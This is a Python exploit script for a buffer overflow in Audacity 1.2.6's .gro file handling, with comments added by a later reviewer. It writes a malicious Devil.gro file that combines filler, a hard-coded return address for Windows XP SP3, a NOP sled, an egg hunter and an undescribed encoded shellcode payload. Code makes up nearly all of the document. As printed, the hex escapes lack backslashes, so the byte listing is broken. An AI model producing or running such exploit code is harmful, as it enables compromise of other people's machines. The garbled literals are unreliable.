# Title : Audacity 1.2.6 (gro File) Buffer overflow Exploit
# Published : 2009-12-05
# Author : Encrypt3d.M!Nd
#exploit.py
# Audacity 1.2.6 (gro File) Buffer overflow Exploit
# By: Encrypt3d.M!nd
# http://m1nd3d.wordpress.com/
#####################################################
# I know this exploit has already been posted, but the author
# used an address as a universal one; well, it's universal, but
# it can't be called to jump to, because it causes a privileged
# exception, so you can't just use it.
#
# Tested on: Windows xp sp3
#
# Writes one file, Devil.gro, into the current working directory. The
# output is the string fragments below concatenated in the order given at
# the write() call near the bottom; nothing is computed beyond that.
#
# NOTE(review): as reproduced on this page every literal reads `x44`,
# `xeb`, ... with no backslash. Read as written, each `xNN` token is three
# ASCII characters (so `chars` is 522 characters long, not 174 bytes); the
# missing backslashes look like an extraction artifact, so byte counts and
# offsets cannot be read off this listing as-is.
chars = "x44" * 174  # filler run; used twice in the layout (see write() below)
ns= "xebx08x90x90"  # 4-token fragment; the author gives no description of it
# Fixed address supplied by the author for the msacm32.drv build on the
# platform named in the header ("Tested on: Windows xp sp3"); the value is
# tied to that exact module build, which is what makes it non-universal.
sh= "xbex2exd1x72" # Windows xp sp3 - msacm32.drv
nops= "x90"* 20  # 20-token run of a single value
# The name suggests an egg hunter. Note it embeds the same 4-token sequence
# `x69x72x61x71` that `shellcode` opens with (twice) — presumably the tag
# it searches for; the page does not state this, so confirm before relying
# on it.
eggh= "x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8x69x72x61x71x8BxFAxAFx75xEAxAFx75xE7xFFxE7"
# Payload: an 8-token tag (the 4-token sequence above, repeated) followed by
# a long fixed blob. The page does not describe what the blob does. For
# detection purposes, the repeated tag and the long single-value runs are
# the fixed, easily matched parts of the generated file.
shellcode= "x69x72x61x71x69x72x61x71"
shellcode+= (
"x89xe6xd9xc7xd9x76xf4x59x49x49x49x49x49x49x49"
"x49x49x49x49x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx4ax48x4cx49x43x30x43x30x45x50x45x30x4bx39"
"x4ax45x46x51x4ex32x51x74x4cx4bx46x32x44x70x4c"
"x4bx42x72x44x4cx4ex6bx43x62x42x34x4ex6bx51x62"
"x47x58x44x4fx48x37x51x5ax45x76x46x51x49x6fx45"
"x61x4fx30x4ex4cx47x4cx51x71x51x6cx45x52x46x4c"
"x47x50x4fx31x4ax6fx44x4dx45x51x4fx37x4dx32x48"
"x70x42x72x46x37x4cx4bx46x32x42x30x4ex6bx50x42"
"x45x6cx47x71x4ex30x4ex6bx51x50x51x68x4cx45x4f"
"x30x44x34x51x5ax46x61x48x50x42x70x4cx4bx50x48"
"x42x38x4cx4bx50x58x51x30x46x61x4ex33x4dx33x47"
"x4cx43x79x4cx4bx50x34x4cx4bx46x61x4ax76x46x51"
"x49x6fx44x71x49x50x4cx6cx4bx71x4ax6fx46x6dx47"
"x71x4fx37x46x58x4bx50x43x45x4ax54x43x33x43x4d"
"x4bx48x47x4bx43x4dx51x34x43x45x4bx52x42x78x4c"
"x4bx46x38x45x74x46x61x4ax73x45x36x4cx4bx46x6c"
"x50x4bx4ex6bx43x68x45x4cx46x61x4ex33x4cx4bx46"
"x64x4ex6bx43x31x4ex30x4ex69x51x54x46x44x51x34"
"x51x4bx51x4bx43x51x51x49x51x4ax50x51x49x6fx49"
"x70x51x48x51x4fx43x6ax4cx4bx42x32x4ax4bx4fx76"
"x43x6dx50x6ax47x71x4ex6dx4dx55x4ex59x47x70x43"
"x30x45x50x46x30x42x48x44x71x4ex6bx42x4fx4fx77"
"x4bx4fx4ax75x4dx6bx4dx30x45x4dx46x4ax44x4ax42"
"x48x49x36x4cx55x4dx6dx4dx4dx49x6fx4ex35x45x6c"
"x45x56x51x6cx44x4ax4bx30x4bx4bx4bx50x51x65x44"
"x45x4dx6bx50x47x44x53x42x52x50x6fx42x4ax43x30"
"x46x33x4bx4fx4ax75x42x43x50x61x50x6cx42x43x43"
"x30x41x41")
# Text-mode open, closed explicitly rather than via a `with` block, so the
# handle is not released if write() raises. The module-level name `file`
# shadows the Python 2 builtin of the same name.
file = open('Devil.gro','w')
# Layout of the output, left to right: filler, ns, sh, nops, eggh, the same
# filler again, then shellcode.
file.write(chars+ns+sh+nops+eggh+chars+shellcode)
file.close()